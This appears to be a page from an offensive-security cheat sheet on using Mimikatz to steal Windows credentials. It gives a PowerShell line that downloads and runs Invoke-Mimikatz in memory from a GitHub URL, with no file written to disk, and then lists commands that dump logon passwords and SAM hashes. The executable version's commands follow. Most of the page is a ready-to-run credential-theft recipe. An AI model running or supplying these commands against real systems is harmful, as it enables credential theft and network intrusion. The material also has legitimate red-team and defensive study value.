Mimikatz

1) Powershell.

2) Executable.

Powershell => Mimikatz.ps1

Reflectively loads Mimikatz 2.0 in memory using PowerShell. Can be used to dump credentials without writing anything to disk. Can be used for any functionality provided with Mimikatz.

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -DumpCreds #Dump creds from memory
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"'

Executable => Mimikatz

privilege::debug
sekurlsa::logonpasswords

PreviousCredentials Hunting.NextSecretsdump

Last updated 3 years ago